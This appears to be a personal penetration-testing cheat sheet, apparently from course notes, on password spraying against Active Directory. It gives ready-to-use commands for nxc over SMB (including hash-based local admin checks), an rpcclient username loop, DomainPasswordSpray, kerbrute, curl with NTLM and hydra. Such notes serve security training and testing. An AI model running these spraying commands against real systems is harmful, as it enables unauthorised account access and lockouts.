Password spraying

active_directory_enumeration_attacks breachingad passwordattacks

Password spraying is a technique that is the most commonly used nowadays to find a working credential pair.

We select a password and test it on a list of usernames. After a delay, we repeat this step with another password. πŸ€–

Many companies have some password policy that may include account lookout after a certain number of failed attempts, which makes brute force impractical as we would lock all accounts.

Some tools you might use:

Many network authentication tools can be used such as hydra -C.


Windows Credentials Password spraying

Leveraging SMB

active_directory_enumeration_attacks

You can use SMB:

$ nxc smb IP -u wordlist -p PasswordHere
$ nxc smb IP -u wordlist -p PasswordHere | grep +
$ nxc smb --local-auth CIDR -u administrator -H hash | grep +

Leveraging RPC

active_directory_enumeration_attacks

A very poor but straightforward RPC password spraying:

$ for u in $(cat wordlist);do rpcclient -U "$u%PasswordHere" -c "getusername;quit" IP | grep Authority; done

Leveraging A Domain-joined Host

active_directory_enumeration_attacks

You may use DomainPasswordSpray (1.6k ⭐):

PS> Import-Module .\DomainPasswordSpray.ps1
PS> Invoke-DomainPasswordSpray -Password PasswordHere -OutFile output.txt -ErrorAction SilentlyContinue

Leveraging Kerberos Authentication Module

active_directory_enumeration_attacks

We can use kerbrute:

$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword

HTTP LDAP Credentials Password spraying

breachingad

We can use curl to test a pair of credentials:

$ curl URL -u "username:password" --ntlm

We can also use tools such as hydra:

$ hydra -L usernames.txt -p password example.com http-get

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.